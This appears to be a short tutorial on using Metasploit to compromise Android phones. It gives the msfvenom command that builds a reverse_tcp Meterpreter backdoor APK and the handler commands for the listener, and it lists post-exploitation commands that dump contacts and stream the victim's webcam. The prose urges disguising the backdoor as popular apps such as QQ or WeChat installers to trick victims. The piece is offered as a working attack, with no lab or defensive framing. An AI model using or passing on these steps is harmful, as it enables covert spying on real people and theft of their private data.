1. Introduction to Metasploit and its monitoring module
2. The principle of mobile phone penetration
3. Create malware and obtain shell privileges
4. Actual combat: remote control
msf
Metasploit is a free, downloadable framework that makes it easy to acquire, develop, and exploit computer software vulnerabilities. It itself comes with professional-grade exploit tools for thousands of known software vulnerabilities. When HD Moore released Metasploit in 2003, the computer security landscape was changed forever. Seemingly overnight, anyone can become a hacker, and everyone can use attack tools to exploit unpatched or just patched vulnerabilities. Software vendors can no longer delay releasing patches for published vulnerabilities because the Metasploit team has been hard at work developing various attack tools and contributing them to all Metasploit users.
When we cannot install the other side's network boundary, we often need to take the initiative to attack. For example, send an apk software containing a backdoor, or a word document, pdf file, etc. to the target mobile phone. To achieve the effect, we must also make good use of social engineering to trick victims into executing malicious programs.
Hackers carry out specific active attacks according to different groups of people, such as binding the backdoor to some popular software, or binding it to some online game plug-ins or their patches, and then uploading them to the Internet for them to download. It can also be disguised as QQ or WeChat installation software and provided to those in need.
msfvenom is a combination of msfpayload and msfencode, which can generate a Trojan horse program, execute it on the target machine, and monitor it locally
start
Generate an Android backdoor
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 > shell.apk
Use msf to enable monitoring
* use exploit/multi/handler
* set payload android/meterpreter/reverse_tcp
* set lhost 192.168.1.10
* set lport 4444
* run
Open the web service in the directory where the apk backdoor is located in kali: python -m SimpleHTTPServer
Visit the URL in the Android browser to download the apk
A session will be established in msf
Execute the command
sysinfo to view the system information
app_list view the installed app file
check_root detect the system root
dump_contacts download the address book information
webcam_list obtain the camera information
webcam_stream open the camera